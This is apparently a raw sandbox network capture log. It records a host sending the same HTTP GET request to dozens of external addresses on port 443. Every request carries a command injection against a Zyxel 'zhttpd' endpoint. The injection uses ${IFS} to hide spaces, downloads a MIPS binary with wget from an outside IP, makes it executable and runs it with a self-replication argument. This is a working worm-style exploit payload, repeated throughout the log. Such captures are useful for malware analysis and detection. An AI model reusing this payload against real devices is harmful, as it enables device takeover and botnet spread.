                                                      Feb 2, 2024 06:36:01.822474003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6651192.168.2.146053292.57.158.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822500944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6652192.168.2.144694098.133.182.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822557926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6653192.168.2.1452190156.113.81.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822601080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6654192.168.2.1439972162.213.50.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822628975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6655192.168.2.1442874150.24.61.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822685957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6656192.168.2.1443484150.55.128.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822727919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6657192.168.2.1435870218.126.211.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822777987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6658192.168.2.1445042136.210.241.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822813988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6659192.168.2.145545052.224.68.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822840929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6660192.168.2.1445794131.190.95.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822899103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6661192.168.2.1439436219.35.91.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822927952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6662192.168.2.1455400136.133.225.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822947025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6663192.168.2.1434172132.113.96.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.822992086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6664192.168.2.145571817.226.80.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823035955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6665192.168.2.145695859.106.15.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823071003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6666192.168.2.1447032191.28.213.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823136091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6667192.168.2.143482453.6.182.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823175907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6668192.168.2.1458562208.170.74.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823206902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6669192.168.2.145041039.78.148.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823265076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6670192.168.2.1442410108.86.35.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823307991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6671192.168.2.146036670.203.114.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823338032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6672192.168.2.1440540143.141.178.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823376894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6673192.168.2.1441588118.90.60.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823430061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6674192.168.2.1433734113.180.228.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823450089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6675192.168.2.1439914136.98.144.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823501110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6676192.168.2.145778014.241.31.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823539019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6677192.168.2.1445040180.67.92.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823575974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6678192.168.2.1440756103.110.120.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823621035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6679192.168.2.1434034213.79.22.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823659897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6680192.168.2.145736418.65.49.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823704004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6681192.168.2.1434438196.68.80.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823734045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6682192.168.2.14533565.230.88.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823791981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6683192.168.2.146057612.46.89.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823828936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6684192.168.2.1445748112.229.230.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823873043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6685192.168.2.145277099.60.1.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823908091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6686192.168.2.145060090.160.234.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.823939085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6687192.168.2.1434820217.160.128.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.824004889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6688192.168.2.145303496.144.112.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.824028969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6689192.168.2.1450056195.45.212.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.824063063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6690192.168.2.1445810134.69.14.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.824111938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6691192.168.2.1443074176.87.239.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.824166059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6692192.168.2.143333447.144.61.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.824198961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6693192.168.2.144738846.141.251.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.824223995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6694192.168.2.1434994152.156.64.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.824275017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6695192.168.2.144347462.46.132.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.824328899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6696192.168.2.1459894134.18.94.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.827644110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6697192.168.2.145151668.251.232.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.827665091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6698192.168.2.144806465.168.173.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.828222990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6699192.168.2.144938689.114.27.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.828254938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6700192.168.2.143539081.59.149.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.828290939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6701192.168.2.144702877.42.26.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.828330040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6702192.168.2.145875239.224.62.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.828386068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6703192.168.2.145162090.30.58.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.828411102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6704192.168.2.1447878197.37.115.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.828478098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6705192.168.2.1446804140.159.220.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.828489065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6706192.168.2.1433360131.197.78.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.828507900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6707192.168.2.1443976197.229.11.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.828547955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6708192.168.2.1438280149.177.156.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.828576088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6709192.168.2.1445876153.174.96.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.828635931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6710192.168.2.1440406178.253.132.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.828664064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6711192.168.2.1443048177.61.13.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838274002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6712192.168.2.145194040.57.178.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.838309050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6713192.168.2.144761293.216.56.78443
                                                      TimestampBytes transferredDirectionData
